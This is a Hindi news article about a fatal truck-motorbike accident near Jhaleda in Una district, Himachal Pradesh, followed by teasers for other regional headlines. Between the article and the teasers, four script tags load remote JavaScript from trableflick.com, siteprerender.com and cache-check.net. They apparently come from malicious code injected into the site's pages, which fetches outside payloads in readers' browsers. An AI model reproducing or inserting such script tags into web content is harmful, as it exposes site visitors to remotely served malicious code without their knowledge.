<p>जिला ऊना में मुख्यालय के पास झलेड़ा में दर्दनाक सड़क हादसे में एक युवक की मौत हो गई, जबकि एक अन्य घायल हुआ है। घायल को उपचार के लिए ऊना अस्पताल पहुंचाया गया है। मृतक की पहचान 18 साल के प्रिंस निवासी बिहार के रूप में हुई है। घायल हरविंदर भी बिहार का रहने वाला है। पुलिस ने शव को पोस्टमार्टम के लिए क्षेत्रीय अस्पताल ऊना भेज दिया है। पुलिस ने मामले की जांच शुरू कर दी है। जानकारी के अनुसार झलेड़ा के समीप वीरवार सुबह बाईक सवार प्रिंस और हरविंदर जा रहे थे कि अचानक ही ट्रक की चपेट में आ गए। हादसे में बाईक सवार प्रिंस व हरविंदर को गंभीर रूप से चोटें पहुंची।</p>
<p>बताया जा रहा है कि हादसा इतना जबरदस्त था प्रिंस ने हादसे के तुंरत बाद दम तोड़ दिया। दोनों को स्थानीय लोगों की मदद से ऊना अस्पताल पहुंचाया गया, जहां प्रिंस को चिकित्सकों ने मृत घोषित किया। उधर, एएसपी विनोद धीमान ने बताया कि पुलिस ने मामले की जांच शुरू कर दी है। शव को पोस्टमार्टम करवाने के लिए क्षेत्रीय अस्पताल ऊना भेज दिया है। अभी तक हादसे के कारणों का खुलासा नही हो पाया है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1596111776812″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Kinnaur truck accident: किन्नौर ज़िले के निगुलसरी के पास एक सड़क दुर्घटना में एक ईंटों…
Sanjauli Mosque Demolition Controversy: राजधानी शिमला के संजौली क्षेत्र में स्थित मस्जिद की तीन अवैध…
CM Sukhu Announcement: मुख्यमंत्री सुखविंदर सिंह सुक्खू ने बुधवार को आईजीएमसी ट्रॉमा सैंटर के लोकार्पण…
शाहपुर का जिला स्तरीय दशहरा मेले का शुभारंभ भव्य शोभा यात्रा के साथ हुआ।…
CM Sukhwinder Singh Sukhu: हिमाचल प्रदेश के मुख्यमंत्री सुखविंदर सिंह सुक्खू ने इंदिरा गांधी मेडिकल…
Vikramaditya Singh Camp Office Mandi : मंडी की सांसद कंगना रनौत द्वारा मंडी में…